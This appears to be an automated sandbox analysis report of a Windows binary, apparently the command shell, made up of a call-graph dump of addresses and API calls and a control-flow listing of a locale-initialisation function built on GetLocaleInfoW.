21247->21249 21248->21250 21251 19cb96 wcschr 21248->21251 21249->21202 21250->21202 21251->21202 21251->21250 21252->21202 21751 199e09 21253->21751 21256 1ac2b9 21257 1963bd 448 API calls 21256->21257 21260 1ac2d1 21257->21260 21258 199df7 21258->20921 21259 199de1 21259->21258 21261 199950 448 API calls 21259->21261 21260->21258 21765 1b9fcf _get_osfhandle GetFileType 21260->21765 21261->21258 21263 1ac2e5 21264 19dd98 6 API calls 21263->21264 21265 1ac2e9 21263->21265 21264->21265 21265->21258 21266 1978e4 448 API calls 21265->21266 21267 1ac316 21266->21267 21267->21267 21269 19e3f0 17 API calls 21268->21269 21270 197fa0 21269->21270 21271 198001 21270->21271 21272 197fa4 GetDriveTypeW 21270->21272 21273 19800b ??_V@YAXPAX 21271->21273 21274 198013 21271->21274 21278 197fcf 21272->21278 21281 1ab033 21272->21281 21273->21274 21276 1a6b30 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 4 API calls 21274->21276 21275 1ab05a ??_V@YAXPAX 21275->21274 21279 198022 21276->21279 21277 197fe0 GetVolumeInformationW 21277->21271 21280 1ab040 GetLastError 21277->21280 21278->21271 21278->21277 21279->20891 21279->20911 21280->21271 21280->21281 21281->21274 21281->21275 21284 1a2200 21282->21284 21283 1a2229 21283->20910 21284->21283 21285 1a2081 917 API calls 21284->21285 21285->21283 21766 1a26dc memset 21286->21766 21290 19e3f0 17 API calls 21289->21290 21291 195f21 21290->21291 21292 1a9d02 21291->21292 21293 1a9d0f 21291->21293 21294 198e9e 448 API calls 21291->21294 21293->21292 21356 199cd3 21355->21356 21386 199780 21355->21386 21357 19dcd0 448 API calls 21356->21357 21358 199cdd 21357->21358 21359 19a62f wcschr 21358->21359 21358->21386 21386->20921 21563 19aa90 21562->21563 21566 1aca49 21562->21566 21563->21566 21567 19aacb _wcsnicmp 21563->21567 21564 19bc30 448 API calls 21564->21566 21566->21564 21580 1aca70 21566->21580 21656 1b5166 21566->21656 21568 19ab3d 21567->21568 21569 19aadf _wcsnicmp 21567->21569 21587 1a3326 21568->21587 21571 1ac9fd 21569->21571 21577 19aaf7 21569->21577 21619 1b53aa 21571->21619 21574 1978e4 448 API calls 21578 1acb08 21574->21578 21575 19ab0f 21579 19ab1b wcschr 21575->21579 21586 1acad1 21575->21586 21576 1aca2d wcsrchr 21576->21575 21577->21575 21577->21576 21577->21586 21581 19ab29 21579->21581 21582 19ab47 21579->21582 21585 1a0060 5 API calls 21580->21585 21580->21586 21585->21586 21586->21574 21588 1a333b 21587->21588 21589 1a33ab 21587->21589 21588->21589 21592 1a0060 5 API calls 21588->21592 21590 1978e4 448 API calls 21589->21590 21591 1af76c 21590->21591 21593 1a3349 21592->21593 21620 19acb0 448 API calls 21619->21620 21657 1b516f 21656->21657 21660 1b5190 21656->21660 21741 1a727b __iob_func 21657->21741 21659 1b5180 fprintf 21659->21566 21661 1b51dd 21660->21661 21662 199950 448 API calls 21660->21662 21661->21566 21662->21660 21741->21659 21743 19ab7f 2 API calls 21742->21743 21744 19b3d3 21743->21744 21745 19ab7f 2 API calls 21744->21745 21749 19b3eb 21744->21749 21745->21749 21746 19b408 wcschr 21748 19b440 21746->21748 21746->21749 21747 19b3f6 wcschr 21747->21746 21747->21748 21748->21208 21749->21746 21749->21747 21749->21748 21750 19a62f wcschr 21749->21750 21750->21749 21752 199e14 21751->21752 21763 199dd5 21751->21763 21753 199e8e iswspace 21752->21753 21756 199e19 21753->21756 21754 199e27 iswspace 21755 199e40 21754->21755 21754->21756 21757 199e8e iswspace 21755->21757 21756->21754 21756->21755 21756->21763 21758 199e47 21757->21758 21759 1ac31b _wcsnicmp 21758->21759 21760 199e62 21758->21760 21758->21763 21762 199e67 21759->21762 21759->21763 21761 199e71 _wcsnicmp 21760->21761 21760->21762 21761->21762 21761->21763 21762->21763 21764 1978e4 448 API calls 21762->21764 21763->21256 21763->21259 21764->21763 21765->21263 21767 19e3f0 17 API calls 21766->21767 21768 1a27be 21767->21768 21769 1a28f8 21768->21769 21770 1a27c8 memset GetEnvironmentVariableW 21768->21770 21771 1a290a ??_V@YAXPAX 21769->21771 21772 1a2912 21769->21772 21773 19e3f0 17 API calls 21770->21773 21771->21772 21774 1a6b30 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 4 API calls 21772->21774 21775 1a2830 21773->21775 21776 1a2925 21774->21776 21777 1a284a GetEnvironmentVariableW 21775->21777 21792 1a28e2 21775->21792 21776->20921 21779 1af3b2 21777->21779 21780 1a2865 21777->21780 21778 1af431 ??_V@YAXPAX 21778->21769 21782 199144 448 API calls 21779->21782 21797 199144 21780->21797 21783 1af3cd 21782->21783 21783->21780 21785 1978e4 448 API calls 21783->21785 21784 1a2872 21786 198e9e 448 API calls 21784->21786 21787 1af3e7 21784->21787 21784->21792 21785->21780 21792->21769 21792->21778 21798 19bc30 446 API calls 21797->21798 21819 199172 21798->21819 21799 1991a6 towupper 21799->21819 21800 1abb35 21802 19dcd0 446 API calls 21800->21802 21801 1a6b30 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 4 API calls 21803 1a0060 5 API calls 21803->21819 21806 1abad3 21811 1963bd 446 API calls 21806->21811 21807 1a054b 446 API calls 21807->21819 21810 1aba93 21816 1ba53d 446 API calls 21810->21816 21815 19926f 21811->21815 21812 1ab904 21812->21784 21813 1a669f 446 API calls 21813->21819 21815->21801 21816->21806 21817 1992c2 21822 1978e4 446 API calls 21817->21822 21819->21799 21819->21800 21819->21803 21819->21806 21819->21807 21819->21810 21819->21812 21819->21813 21819->21815 21819->21817 21819->21819 21820 1ba37a 446 API calls 21819->21820 21820->21819 22135 19e7a2 22134->22135 22136 19e7c6 22134->22136 22137 19e7ab wcschr 22135->22137 22146 19e697 22135->22146 22139 19dc60 2 API calls 22136->22139 22136->22146 22138 19e7f4 22137->22138 22137->22146 22140 19dcd0 448 API calls 22138->22140 22139->22146 22147 19e7fe 22140->22147 22141 19e83f 22143 19dc60 2 API calls 22141->22143 22141->22146 22142 19bf70 456 API calls 22142->22147 22143->22146 22144 19dd20 448 API calls 22144->22141 22145 19e8f7 22145->22141 22145->22144 22145->22146 22146->20963 22146->20969 22147->22141 22147->22142 22147->22145 22147->22146 22149 1a1606 lstrcmpW 22148->22149 22150 1a1615 lstrcmpiW 22148->22150 22151 1a160c 22149->22151 22150->22151 22151->20986 22153 1a2998 22152->22153 22154 1a2a09 lstrcmpiW 22153->22154 22155 1a29ff lstrcmpW 22153->22155 22156 1a29a0 22153->22156 22154->22156 22155->22156 22156->20986 22158 19a1bd 22157->22158 22158->21027 22159->21027 22161 1a054b 448 API calls 22160->22161 22167 1a0c22 22161->22167 22162 1a0d9e 22163 19bc30 448 API calls 22162->22163 22210 1a0e27 22162->22210 22163->22210 22164 1a10ae 22164->21085 22165 1a1436 CreateFileW 22168 1aed11 22165->22168 22169 1a1457 SetFilePointer SetFilePointer 22165->22169 22166 19dd20 448 API calls 22170 1a0d6a 22166->22170 22167->22162 22171 1a0c93 _wcsnicmp 22167->22171 22196 19dc60 2 API calls 22167->22196 22208 1a054b 448 API calls 22167->22208 22167->22210 22212 1a118f wcstol 22167->22212 22213 1a129a wcstol 22167->22213 22215 1a0d4a 22167->22215 22172 1978e4 448 API calls 22168->22172 22174 19dcd0 448 API calls 22169->22174 22175 19dd20 448 API calls 22170->22175 22173 1a0cac _wcsnicmp 22171->22173 22171->22210 22176 1aed1e GetLastError 22172->22176 22177 1a0cc7 _wcsnicmp 22173->22177 22178 1aebf5 22173->22178 22174->22210 22179 1a0d81 22175->22179 22176->22164 22180 1a0ce2 _wcsnicmp 22177->22180 22177->22210 22188 1978e4 448 API calls 22178->22188 22179->22162 22183 1aec27 22179->22183 22180->22167 22184 1a1131 _wcsnicmp 22180->22184 22181 1a148a ReadFile CloseHandle 22181->22210 22182 1aed00 CloseHandle 22182->22164 22185 1978e4 448 API calls 22183->22185 22191 1a114c _wcsnicmp 22184->22191 22192 1a1563 wcstol 22184->22192 22189 1aec33 22185->22189 22186 19dd20 448 API calls 22186->22210 22187 1a12d3 _wpopen 22193 1a12ff feof 22187->22193 22194 1aece5 22187->22194 22188->22164 22195 1b9922 448 API calls 22189->22195 22190 1a198f 3 API calls 22190->22210 22191->22167 22191->22178 22192->22178 22192->22210 22199 1a136e _pclose 22193->22199 22200 1a1313 ferror 22193->22200 22201 1978e4 448 API calls 22194->22201 22204 1aec3b longjmp 22195->22204 22196->22167 22197 1a1546 22205 19dc60 2 API calls 22197->22205 22198 19dc60 GetProcessHeap RtlFreeHeap 22198->22210 22207 19dd20 448 API calls 22199->22207 22200->22199 22200->22210 22206 1aecf2 GetLastError 22201->22206 22202 1a134d fgets 22202->22199 22202->22210 22203 1aecb3 _pclose 22203->22164 22204->22164 22205->22203 22206->22164 22207->22210 22208->22167 22209 1b98b5 453 API calls 22209->22210 22210->22164 22210->22165 22210->22181 22210->22182 22210->22186 22210->22187 22210->22190 22210->22192 22210->22197 22210->22198 22210->22199 22210->22202 22210->22203 22210->22209 22210->22210 22211 1a13db MultiByteToWideChar 22210->22211 22210->22213 22214 1a14e7 feof 22210->22214 22216 1a0f0a wcschr 22210->22216 22217 19dcd0 448 API calls 22210->22217 22218 1a0fc8 wcschr 22210->22218 22219 1aecc9 22210->22219 22220 1a0bbb 484 API calls 22210->22220 22222 1a13b7 memmove 22210->22222 22223 1a0f90 wcschr 22210->22223 22211->22210 22212->22167 22212->22178 22213->22178 22213->22210 22214->22200 22214->22210 22215->22162 22215->22166 22216->22210 22217->22210 22218->22210 22221 1978e4 448 API calls 22219->22221 22220->22210 22221->22164 22222->22210 22223->22210 22225 196f39 22224->22225 22240 196ea7 22224->22240 22226 1a6b30 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 4 API calls 22225->22226 22227 196f4e 22226->22227 22227->21085 22228 1aa746 22229 1b98b5 453 API calls 22228->22229 22266 19701a 22229->22266 22230 19a62f wcschr 22230->22240 22231 196f5d 22232 1a0060 5 API calls 22231->22232 22233 196f64 22232->22233 22235 19acb0 448 API calls 22233->22235 22234 19dcd0 448 API calls 22234->22266 22236 196f6b 22235->22236 22238 1a589a 10 API calls 22236->22238 22237 1a0bbb 484 API calls 22237->22240 22239 196fa6 22238->22239 22245 198f21 448 API calls 22239->22245 22239->22266 22240->22225 22240->22228 22240->22230 22240->22231 22240->22237 22241 1a198f 3 API calls 22240->22241 22241->22240 22242 19dc60 2 API calls 22242->22266 22243 1b98b5 453 API calls 22243->22266 22244 1a5851 2 API calls 22244->22266 22253 196fbf 22245->22253 22246 1aa7fa 22250 19dc60 2 API calls 22246->22250 22247 1a198f 3 API calls 22247->22266 22248 198b4d 2 API calls 22248->22266 22249 1aa806 22251 1b9922 448 API calls 22249->22251 22250->22249 22254 1aa80b longjmp 22251->22254 22252 19725d 22257 197271 22252->22257 22258 1aa851 22252->22258 22253->22249 22255 19dcd0 448 API calls 22253->22255 22253->22266 22256 1aa819 22254->22256 22255->22266 22309 1a21d2 22256->22309 22261 198bc7 448 API calls 22257->22261 22260 1b9a7d 448 API calls 22258->22260 22264 1aa85c 22260->22264 22265 19727b GetProcessHeap RtlFreeHeap 22261->22265 22262 19dd20 448 API calls 22262->22266 22263 1aa824 22268 1a1e70 448 API calls 22263->22268 22272 1aa835 exit 22263->22272 22267 1972ee 8 API calls 22265->22267 22266->22234 22266->22242 22266->22243 22266->22244 22266->22246 22266->22247 22266->22248 22266->22249 22266->22252 22266->22262 22269 1a0bbb 484 API calls 22266->22269 22270 197294 22267->22270 22268->22263 22269->22266 22308 1972c6 GetProcessHeap RtlFreeHeap GetProcessHeap RtlFreeHeap 22270->22308 22272->22252 22273 19729c GetProcessHeap RtlFreeHeap 22274 1972bc 22273->22274 22274->21085 22276 19a7db 22275->22276 22276->21076 22276->22276 22313 19b45a 22277->22313 22279 1a0bd6 22279->21094 22281 1b769e 458 API calls 22282 1aebcc 22281->22282 22283 1b3b4e 448 API calls 22282->22283 22284 1aebd5 22283->22284 22285 199950 448 API calls 22284->22285 22285->22279 22290 1b3ea6 22286->22290 22287 1b416f 22288 1a6b30 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 4 API calls 22287->22288 22289 1b418b 22288->22289 22289->21085 22290->22287 22291 19dcd0 448 API calls 22290->22291 22296 1b3ef9 22291->22296 22292 196e57 498 API calls 22293 1b3f70 22292->22293 22294 19dc60 2 API calls 22293->22294 22295 1b3f7b 22294->22295 22297 19dcd0 448 API calls 22295->22297 22296->22287 22296->22292 22298 1b3fa4 22297->22298 22298->22287 22299 1b3fe2 FindFirstFileW 22298->22299 22300 1b4164 22299->22300 22304 1b4006 22299->22304 22302 19dc60 2 API calls 22300->22302 22301 1b413c FindNextFileW 22301->22304 22306 1b4153 FindClose 22301->22306 22302->22287 22304->22301 22305 19dd20 448 API calls 22304->22305 22304->22306 22307 1b3e66 498 API calls 22304->22307 22305->22304 22306->22300 22307->22304 22308->22273 22310 1a21df 22309->22310 22311 1a21d6 22309->22311 22310->22263 22311->22310 22312 1af25c SetConsoleTitleW 22311->22312 22312->22263 22325 19b46c 22313->22325 22314 19b484 22323 19b4bf 22314->22323 22331 19b5b0 22314->22331 22315 19b45a 474 API calls 22318 19b4d2 22315->22318 22316 19b53c 22316->22314 22320 19b4c8 22316->22320 22316->22323 22318->22323 22324 19b45a 474 API calls 22318->22324 22320->22315 22320->22323 22321 19b5b0 474 API calls 22321->22325 22322 19b5b0 474 API calls 22327 19b4a5 22322->22327 22323->22279 22323->22281 22328 19b4e4 22324->22328 22325->22314 22325->22316 22325->22320 22325->22321 22325->22323 22326 19b45a 474 API calls 22325->22326 22326->22325 22327->22323 22329 19b5b0 474 API calls 22327->22329 22328->22323 22330 19b5b0 474 API calls 22328->22330 22329->22327 22330->22328 22332 19b5c8 22331->22332 22339 19b490 22331->22339 22333 19dcd0 448 API calls 22332->22333 22332->22339 22338 19b5eb 22333->22338 22334 19b631 22335 19dd20 448 API calls 22334->22335 22334->22339 22335->22339 22336 19ee03 474 API calls 22336->22338 22337 1a01f5 wcsrchr 22337->22338 22338->22334 22338->22336 22338->22337 22338->22339 22339->22322 22339->22323 22405 1a7d90 22340->22405 22342 199467 InitializeProcThreadAttributeList 22343 1994b8 UpdateProcThreadAttribute 22342->22343 22344 1abdf1 GetLastError 22342->22344 22346 1abe0d GetLastError 22343->22346 22347 1994e7 memset memset GetStartupInfoW 22343->22347 22417 1b5c54 22344->22417 22350 1b5c54 448 API calls 22346->22350 22349 1a1d90 451 API calls 22347->22349 22348 1abe03 22348->22346 22351 199579 22349->22351 22352 1abe1f DeleteProcThreadAttributeList 22350->22352 22354 19acb0 448 API calls 22351->22354 22353 1abe5c 22352->22353 22353->21125 22356 199589 22354->22356 22355 1abe49 _local_unwind4 22355->22353 22356->22355 22357 1a01f5 wcsrchr 22356->22357 22359 1995c6 22356->22359 22358 1995ae 22357->22358 22358->22359 22360 1995b2 lstrcmpW 22358->22360 22406 198235 _get_osfhandle SetConsoleMode _get_osfhandle SetConsoleMode 22359->22406 22360->22359 22362 1abe83 22360->22362 22422 1b50d8 22362->22422 22363 1995cb 22365 1995d8 22363->22365 22368 199711 CreateProcessAsUserW 22363->22368 22366 1995e5 CreateProcessW 22365->22366 22367 1abec4 22365->22367 22369 199608 22366->22369 22371 1abece GetLastError 22367->22371 22368->22369 22369->22371 22372 199612 CloseHandle 22369->22372 22374 19963a 22371->22374 22373 19a976 8 API calls 22372->22373 22373->22374 22400 1a21d2 SetConsoleTitleW 22399->22400 22401 1a21c0 22400->22401 22401->21131 22403 1a21d2 SetConsoleTitleW 22402->22403 22404 1a21cc 22403->22404 22404->21131 22405->22342 22406->22363 22421 1b5c6a 22417->22421 22418 1b5d93 22418->22348 22419 1978e4 448 API calls 22420 1b5dfe 22419->22420 22420->22348 22421->22418 22421->22419 22423 1a1d90 451 API calls 22422->22423 22424 1b50e8 22423->22424 22504 1b13ca 22503->22504 22505 1a56e2 22503->22505 22506 1b155c 22504->22506 22510 1b126a longjmp 22504->22510 22515 1b13e2 22504->22515 22529 1b14e7 22504->22529 22507 1a56ef 22505->22507 22512 1b1303 22505->22512 22513 1b1256 22505->22513 22509 1a5726 449 API calls 22506->22509 22564 1a5726 22507->22564 22552 1b12fb 22509->22552 22514 1b1277 22510->22514 22511 1a56fe 22516 1a5711 22511->22516 22522 1a5726 449 API calls 22511->22522 22520 1a5726 449 API calls 22512->22520 22513->22507 22513->22514 22526 1b1264 22513->22526 22517 1a5726 449 API calls 22514->22517 22518 1b1433 22515->22518 22519 1b13e7 22515->22519 22576 1a57c9 22516->22576 22537 1b1288 22517->22537 22525 1a57c9 449 API calls 22518->22525 22519->22510 22527 1b13fc 22519->22527 22534 1b1316 22520->22534 22521 1a5726 449 API calls 22521->22506 22522->22516 22524 1a56c4 449 API calls 22531 1b1583 22524->22531 22540 1b143b 22525->22540 22526->22510 22526->22518 22535 1a5726 449 API calls 22527->22535 22528 1b136e 22532 1a5726 449 API calls 22528->22532 22529->22521 22530 1a571d 22530->21138 22531->21138 22536 1b1380 22532->22536 22533 1b1471 22539 1a56c4 449 API calls 22533->22539 22534->22528 22549 1a5726 449 API calls 22534->22549 22553 1b1326 22534->22553 22535->22530 22542 1a5726 449 API calls 22536->22542 22538 1b12c7 22537->22538 22543 1a5726 449 API calls 22537->22543 22544 1a56c4 449 API calls 22538->22544 22545 1b14c2 22539->22545 22540->22533 22554 1b147a 22540->22554 22555 1b145c 22540->22555 22541 1a5726 449 API calls 22541->22528 22546 1b1390 22542->22546 22543->22538 22547 1b12d6 22544->22547 22548 1a5726 449 API calls 22545->22548 22550 1a5726 449 API calls 22546->22550 22551 1a56c4 449 API calls 22547->22551 22548->22552 22549->22553 22556 1b139f 22550->22556 22557 1b12e3 22551->22557 22552->22524 22552->22530 22553->22528 22553->22541 22558 1a5726 449 API calls 22554->22558 22555->22533 22560 1a5726 449 API calls 22555->22560 22559 1a5726 449 API calls 22556->22559 22557->22530 22562 1a5726 449 API calls 22557->22562 22558->22533 22561 1b13b0 22559->22561 22560->22533 22563 1a5726 449 API calls 22561->22563 22562->22552 22563->22552 22565 1a573f 22564->22565 22565->22565 22566 1978e4 448 API calls 22565->22566 22571 1a5781 22565->22571 22567 1b159e longjmp 22566->22567 22568 1b15ae 22567->22568 22569 1a5726 448 API calls 22568->22569 22570 1b15c9 22569->22570 22572 1a5726 448 API calls 22570->22572 22571->22511 22573 1b15f4 22572->22573 22574 1a5726 448 API calls 22573->22574 22575 1b1603 22574->22575 22575->22511 22577 1a57e4 22576->22577 22577->22530 22578 1a5726 449 API calls 22577->22578 22579 1b15c9 22578->22579 22580 1a5726 449 API calls 22579->22580 22581 1b15f4 22580->22581 22582 1a5726 449 API calls 22581->22582 22583 1b1603 22582->22583 22583->22530 22585 1a1eb2 22584->22585 22586 1af110 22585->22586 22589 1a1eef 22585->22589 22591 1a1ebc 22585->22591 22587 1a72ef ApiSetQueryApiSetPresence 22586->22587 22588 1af12e 22587->22588 22588->18693 22590 1af15b realloc 22589->22590 22589->22591 22590->22591 22591->18693 22593 1a6474 22592->22593 22594 1a6464 NtOpenProcessToken 22592->22594 22595 1a62fa 22593->22595 22602 1a6500 NtQueryInformationToken 22593->22602 22594->22593 22595->18705 22595->18707 22598 1a64a8 22598->22595 22599 1a64bc NtClose 22598->22599 22599->22595 22601->18727 22603 1a648a 22602->22603 22604 1a6534 22602->22604 22603->22598 22606 1a64ca NtQueryInformationToken 22603->22606 22604->22603 22605 1b2018 NtQueryInformationToken 22604->22605 22605->22603 22607 1a64f3 22606->22607 22607->22598 22608 1a6ec0 SetUnhandledExceptionFilter 25601 1b68e0 25602 1b68fc 25601->25602 25603 1b68f1 25601->25603 25605 1b5679 462 API calls 25602->25605 25607 1b5679 25603->25607 25606 1b68f6 25605->25606 25631 1a71a8 25607->25631 25609 1b5685 RegOpenKeyExW 25610 1b56bb 25609->25610 25611 1b5775 25609->25611 25612 19bc30 448 API calls 25610->25612 25611->25606 25613 1b56cd 25612->25613 25614 1b56da 25613->25614 25615 1a0060 5 API calls 25613->25615 25632 1b57a8 25614->25632 25617 1b56ed 25615->25617 25618 19acb0 448 API calls 25617->25618 25620 1b56f4 25618->25620 25620->25614 25622 1b5711 25620->25622 25623 1b56e4 25620->25623 25621 1978e4 448 API calls 25621->25623 25624 1a0060 5 API calls 25622->25624 25629 1b5716 25622->25629 25682 1b5799 25623->25682 25625 1b5737 25624->25625 25626 19acb0 448 API calls 25625->25626 25627 1b573e 25626->25627 25627->25623 25628 1b5759 25627->25628 25627->25629 25660 1b64db 25628->25660 25629->25621 25631->25609 25633 1b58af 25632->25633 25652 1b57d0 25632->25652 25634 19ab7f 2 API calls 25633->25634 25636 1b58b6 25634->25636 25635 1b57da RegEnumKeyExW 25637 1b5892 25635->25637 25635->25652 25638 19acb0 448 API calls 25636->25638 25641 1a6b30 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 4 API calls 25637->25641 25640 1b58bd 25638->25640 25639 1b62b3 452 API calls 25639->25652 25640->25637 25643 1a01f5 wcsrchr 25640->25643 25644 1b5946 25641->25644 25642 1b5885 GetLastError 25646 1978e4 448 API calls 25642->25646 25645 1b58cd 25643->25645 25644->25623 25647 1b62b3 452 API calls 25645->25647 25646->25637 25650 1b58df 25647->25650 25648 199950 448 API calls 25648->25652 25649 19dc60 2 API calls 25649->25652 25651 1b5913 25650->25651 25655 1b5903 25650->25655 25653 1978e4 448 API calls 25651->25653 25652->25635 25652->25637 25652->25639 25652->25642 25652->25648 25652->25649 25654 1b590f 25653->25654 25656 19dc60 2 API calls 25654->25656 25657 199950 448 API calls 25655->25657 25658 1b5930 25656->25658 25657->25654 25659 19dc60 2 API calls 25658->25659 25659->25637 25661 1b64e7 25660->25661 25662 1b658c RegDeleteKeyExW 25661->25662 25664 1b6502 RegCreateKeyExW 25661->25664 25663 1b659f RegOpenKeyExW 25662->25663 25677 1b656b 25662->25677 25666 1b65cc RegDeleteValueW 25663->25666 25667 1b65bc 25663->25667 25668 1b651e RegSetValueExW 25664->25668 25669 1b6573 25664->25669 25665 1a72ef ApiSetQueryApiSetPresence 25671 1b6601 25665->25671 25672 1b65e3 25666->25672 25666->25677 25674 1978e4 448 API calls 25667->25674 25667->25677 25679 1b6559 25668->25679 25670 1978e4 448 API calls 25669->25670 25673 1b657a 25670->25673 25671->25623 25676 1978e4 448 API calls 25672->25676 25678 1978e4 448 API calls 25673->25678 25674->25677 25676->25677 25677->25665 25677->25671 25678->25677 25679->25669 25680 1b655d 25679->25680 25681 199950 448 API calls 25680->25681 25681->25677 25683 19dc60 2 API calls 25682->25683 25684 1b57a0 25683->25684 25685 19dc60 2 API calls 25684->25685 25686 1b57a7 25685->25686 25686->25611

                                                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                                                          Function 00198572 Relevance: 45.9, APIs: 15, Strings: 11, Instructions: 392COMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 165 198572-1985a6 call 198791 GetLocaleInfoW 168 1ab2f9-1ab300 165->168 169 1985ac-1985c4 GetLocaleInfoW 165->169 170 1ab302-1ab30a 168->170 171 198602-19861c GetLocaleInfoW 169->171 172 1985c6-1985cb 169->172 176 1ab30c-1ab313 170->176 177 1ab320-1ab322 170->177 174 19863e-19865e GetLocaleInfoW 171->174 175 19861e-198628 171->175 173 1985d1-1985d7 172->173 178 1985dd-1985e0 173->178 179 198787-198789 173->179 182 198660-198667 174->182 183 198673-198685 GetLocaleInfoW 174->183 180 19862e-198634 175->180 181 1ab331-1ab334 175->181 176->177 184 1ab315-1ab31e 176->184 185 1ab327-1ab329 177->185 186 1ab324 177->186 187 1985fb-1985fd 178->187 188 1985e2-1985ea 178->188 179->168 180->174 189 1ab358-1ab36c 181->189 190 1ab336-1ab339 181->190 182->183 191 198669 182->191 192 19868b-1986a0 GetLocaleInfoW 183->192 193 1ab371-1ab378 183->193 184->170 184->177 185->181 186->185 187->171 188->179 194 1985f0-1985f9 188->194 189->174 190->174 195 1ab33f-1ab353 190->195 191->183 197 1ab3a9-1ab3b0 192->197 198 1986a6-1986b8 GetLocaleInfoW 192->198 196 1ab37a-1ab382 193->196 194->173 194->187 195->174 199 1ab398-1ab39a 196->199 200 1ab384-1ab38b 196->200 203 1ab3b2-1ab3ba 197->203 201 1986be-1986d0 GetLocaleInfoW 198->201 202 1ab3e1-1ab3e8 198->202 208 1ab39f-1ab3a1 199->208 209 1ab39c 199->209 200->199 207 1ab38d-1ab396 200->207 210 1ab419-1ab420 201->210 211 1986d6-1986e8 GetLocaleInfoW 201->211 206 1ab3ea-1ab3f2 202->206 204 1ab3bc-1ab3c3 203->204 205 1ab3d0-1ab3d2 203->205 204->205 214 1ab3c5-1ab3ce 204->214 215 1ab3d7-1ab3d9 205->215 216 1ab3d4 205->216 217 1ab408-1ab40a 206->217 218 1ab3f4-1ab3fb 206->218 207->196 207->199 208->197 209->208 219 1ab422-1ab42a 210->219 212 1986ee-198700 GetLocaleInfoW 211->212 213 1ab451-1ab458 211->213 222 1ab489-1ab490 212->222 223 198706-198718 GetLocaleInfoW 212->223 224 1ab45a-1ab462 213->224 214->203 214->205 215->202 216->215 226 1ab40f-1ab411 217->226 227 1ab40c 217->227 218->217 225 1ab3fd-1ab406 218->225 220 1ab42c-1ab433 219->220 221 1ab440-1ab442 219->221 220->221 228 1ab435-1ab43e 220->228 231 1ab447-1ab449 221->231 232 1ab444 221->232 235 1ab492-1ab49a 222->235 229 19871e-198730 GetLocaleInfoW 223->229 230 1ab4c1-1ab4c8 223->230 233 1ab478-1ab47a 224->233 234 1ab464-1ab46b 224->234 225->206 225->217 226->210 227->226 228->219 228->221 238 1ab4f9-1ab4fe 229->238 239 198736-19874b GetLocaleInfoW 229->239 240 1ab4ca-1ab4d2 230->240 231->213 232->231 242 1ab47f-1ab481 233->242 243 1ab47c 233->243 234->233 241 1ab46d-1ab476 234->241 236 1ab49c-1ab4a3 235->236 237 1ab4b0-1ab4b2 235->237 236->237 244 1ab4a5-1ab4ae 236->244 245 1ab4b7-1ab4b9 237->245 246 1ab4b4 237->246 251 1ab500-1ab508 238->251 247 1ab52f-1ab536 239->247 248 198751-198763 GetLocaleInfoW 239->248 249 1ab4e8-1ab4ea 240->249 250 1ab4d4-1ab4db 240->250 241->224 241->233 242->222 243->242 244->235 244->237 245->230 246->245 256 1ab538-1ab540 247->256 254 198769-198786 setlocale call 1a6b30 248->254 255 1ab567-1ab56c 248->255 258 1ab4ef-1ab4f1 249->258 259 1ab4ec 249->259 250->249 257 1ab4dd-1ab4e6 250->257 252 1ab50a-1ab511 251->252 253 1ab51e-1ab520 251->253 252->253 260 1ab513-1ab51c 252->260 261 1ab522 253->261 262 1ab525-1ab527 253->262 266 1ab56e-1ab576 255->266 264 1ab542-1ab549 256->264 265 1ab556-1ab558 256->265 257->240 257->249 258->238 259->258 260->251 260->253 261->262 262->247 264->265 270 1ab54b-1ab554 264->270 271 1ab55a 265->271 272 1ab55d-1ab55f 265->272 267 1ab578-1ab57f 266->267 268 1ab58c-1ab58e 266->268 267->268 273 1ab581-1ab58a 267->273 274 1ab593-1ab595 268->274 275 1ab590 268->275 270->256 270->265 271->272 272->255 273->266 273->268 275->274
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00198791: GetUserDefaultLCID.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00196906,0000001F,?,00000080), ref: 00198791
                                                                                                                                                                                                                          • GetLocaleInfoW.KERNELBASE(00000000,0000001E,001CC9E0,00000008), ref: 0019859E
                                                                                                                                                                                                                          • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000023,?,00000080), ref: 001985BC
                                                                                                                                                                                                                          • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000021,?,00000080), ref: 00198614
                                                                                                                                                                                                                          • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000024,?,00000080), ref: 00198653
                                                                                                                                                                                                                          • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,0000001D,001CC9D0,00000008), ref: 0019867D
                                                                                                                                                                                                                          • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000031,001CC970,00000020), ref: 00198698
                                                                                                                                                                                                                          • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000032,001CC930,00000020), ref: 001986B0
                                                                                                                                                                                                                          • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000033,001CC8F0,00000020), ref: 001986C8
                                                                                                                                                                                                                          • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000034,001CC8B0,00000020), ref: 001986E0
                                                                                                                                                                                                                          • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000035,001CC870,00000020), ref: 001986F8
                                                                                                                                                                                                                          • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000036,001CC830,00000020), ref: 00198710
                                                                                                                                                                                                                          • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000037,001CC7F0,00000020), ref: 00198728
                                                                                                                                                                                                                          • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,0000000E,001CC9C0,00000008), ref: 00198743
